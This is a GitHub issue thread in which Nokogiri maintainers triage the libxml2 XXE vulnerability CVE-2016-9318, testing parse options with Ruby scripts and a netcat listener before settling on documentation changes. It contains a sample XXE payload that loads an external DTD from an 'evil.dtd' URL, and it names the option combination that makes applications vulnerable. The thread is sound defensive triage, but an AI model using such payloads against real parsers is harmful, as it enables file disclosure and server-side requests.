-
-
Notifications
You must be signed in to change notification settings - Fork 901
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
libxml 2.9.{4,5,...} is vulnerable to CVE-2016-9318 #1582
Comments
CVE-2016-9318 resourcesFor the libxml2 vulnerability:
|
attempt 1 to exploit: default Nokogiri parse optionsIn a console window, start up netcat listening on port 8080: $ nc -l 0.0.0.0 8080 Then, in a second console windows, run this Ruby script: #! /usr/bin/env ruby
require 'nokogiri'
require 'yaml'
puts Nokogiri::VERSION_INFO.to_yaml
xml = <<-EOX
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://0.0.0.0:8080/evil.dtd"> %remote;]>
EOX
doc = Nokogiri::XML(xml)
puts "--- xml: ---"
puts doc.to_xml
puts "--- errors: ---"
puts doc.errors Output from ruby script:
Output from netcat: nothing conclusion for default parse optionsWith default parse options, Nokogiri does not expose this libxml2 vulnerability. |
attempt 2 to exploit: opt into DTD loadingHere we'll opt into the #! /usr/bin/env ruby
require 'nokogiri'
require 'yaml'
puts Nokogiri::VERSION_INFO.to_yaml
xml = <<-EOX
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://0.0.0.0:8080/evil.dtd"> %remote;]>
EOX
doc = Nokogiri::XML(xml) do |config|
config.dtdload
end
puts "--- xml: ---"
puts doc.to_xml
puts "--- errors: ---"
puts doc.errors Output from ruby:
conclusion for opting into DTD loadingNote that we see a parse error saying an attempt was made to load a network entity; however, netcat again shows no output, and thus we can conclude that no network connection was made. |
attempt 3 to exploit: opt into DTD loading and network accessHere we'll opt into the (This is a confusing option; the name of the option is "nonet", and we prefix it with "no" to flip it off, hence ...
doc = Nokogiri::XML(xml) do |config|
config.dtdload.nononet
end
... This time, however, we can see that netcat accepts a connection:
Terminating the netcat process allows the Ruby process to complete. conclusion for opting into both DTD loading and network accessOnly with both of these options being opted into would an application using Nokogiri be vulnerable to this CVE. |
triage summaryThe TL;DR is that, because Nokogiri does not load DTDs by default, and also does not access the network by default, any application using Nokogiri would need to opt into both of these options in order to be vulnerable. We do note in our docs that the "NONET" option shouldn't be turned off unless trusted documents are being parsed; but we could do a better job of communicating the risks associated with hitting the network. I'd love to hear any thoughts y'all might have about how to articulate that more clearly. For example, I've opened #1583 to clarify documentation of In the meantime, it does not look like there's an upstream fix committed yet; though I do see a couple of patches are being debated on the libxml2 bugzilla ticket. When a patch is available upstream, we'll evaluate next steps. One option might be to pull in that specific commit as a patch within Nokogiri (and potentially make library changes should any behavior changes be required (like a new libxml2 parse option)). |
Just checked, no movement upstream yet. |
Checked again, no upstream commit yet. |
Checked upstream again, there was a commit made to try to address this:
but it was reverted:
and there isn't an obvious upstream commit addressing it at this point. |
Just checked upstream again, and there still doesn't seem to be a fix addressing this underlying CVE. |
Hey, this issue got a prominent mention in https://snyk.io/stateofossecurity/. Hello, world. The snyk report says "until libxml2 addresses the issue, Nokogiri will remain vulnerable", but I think this misses the nuance that Nokogiri's defaults are secure; the software using Nokogiri is only vulnerable if users specifically opt into two different options in combination. Lots more detail above for those who are interested. |
Thanks for your continued work on this, Mike. I don’t fully understand the issue, but is there a way to get Nokogiri to look out for that specific configuration, ignore it, and raise a warning about the CVE? |
@joeldrapper great question. A brief explanation of the general class of vulnerabilities known as "XXE" can be found here in the OWASP wiki. Key summary (emphasis is from the original):
In other words, if you tell libxml2 it's OK to download and parse arbitrary documents from the internet, bad things are going to happen. Note that this is a configuration that must be opted-into. For trusted documents, it's very reasonable to want to load external DTDs and go over the network to do so. These are features that are built into libxml2 and Nokogiri for very good reasons; they're just features that shouldn't be run on untrusted documents. So, we can't ignore those options without breaking trusted-document use cases. We could emit a warning, but there are people who go crazy about seeing "unnecessary" output from a library, which means then we would need to provide a mechanism for shushing Nokogiri ... I'm hesitant to go down this path without some very compelling reasons. |
Any update on the upstream bug? I got the message: "You are not authorized to access bug #772726." Was it deleted or do I just not have access? |
Looks like there may be a fix here: GNOME/libxml2@ad88b54 But it's only released in an RC, and I'm not sure if it's a full fix. I also can't access the original bugzilla issue and get the same "You are not authorized" message. Seems like maybe they made the issue private? Regardless, Nokogiri isn't vulnerable by default so that's good. |
I see from the Releases of libxml2 that 2.9.8 have been released already. Not sure if I'm understanding it correctly but does this mean that the upstream bug has already been fixed? |
is the CVE-2016-9318 fixed in libxml 2.9.7 |
I don't believe libxml2
We can add our own loader to nokogiri if required using |
@flavorjones following up on your earlier comment. I looked into this more and it looks like opting into
|
@jvshahid ok, but nokogiri is still secure "by default" against this flavor of XXE as well. question for you (any anyone else lurking) is what's actionable? do you feel that we need to update docs to include this fact as well? historical note, here's the docs update I made which was referenced earlier in this issue's lengthy history: 3b9d2ff |
I just wanted to point out that enabling entity expansion/loading (even with
|
This comment was marked as off-topic.
This comment was marked as off-topic.
This comment was marked as off-topic.
This comment was marked as off-topic.
Hi everybody who's following this issue! This issue came up in a conversation in flavorjones/loofah#140 and so I wanted to close the loop here. As mentioned above, libxml2 2.9.8 addressed the underlying CVE that this issue was created to track in Nokogiri. libxml2 2.9.8 was pulled into Nokogiri in commit b28c5f4 which was rolled into Nokogiri v1.8.3. So, for many of you who are using "security scanners," the version of libxml2 in v1.8.3 and later technically addresses the CVE and you should be green now. However, as @jvshahid brings up in #1582 (comment) we should probably similarly document that
Thoughts? I'll move forward with this plan in a few days unless I hear compelling objections or other ideas. |
Two more notes: First, a link to OWASP's cheat sheet on securing against XXE: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#libxml2 To save you a click, it says:
Second, a link to a whitepaper on entity attacks: https://www.vsecurity.com//download/papers/XMLDTDEntityAttacks.pdf Specifically, this section notes how confusing the NOENT option is (relevant sentence highlighted): |
specifically noting what options are unsafe for untrusted documents. Related to #1582
#2653 has been created to document |
I've created draft PR #2654 to explore using a "noxxe" entity loader when |
Closing this issue out, finally, now that the two final action items have been started under other issues. |
Credit for reporting this vulnerability to Nokogiri Core goes to Danny Grander danny@snyk.io, @grnd. Thanks, Danny!
This issue is being opened for nokogiri core to triage this vulnerability within the context of Nokogiri.
Triage summary:
Applications using Nokogiri 1.5.4 (circa June 2012) and later are not vulnerable to this CVE unless opting into the
DTDLOAD
option and opting out of theNONET
option.Note that by default, Nokogiri turns off both DTD loading and network access, treating all docs as untrusted docs. This behavior is independent of the version of libxml2 used.
Also note that an upstream fix is not available from libxml2 upstream as of 2017-11-13.
The text was updated successfully, but these errors were encountered: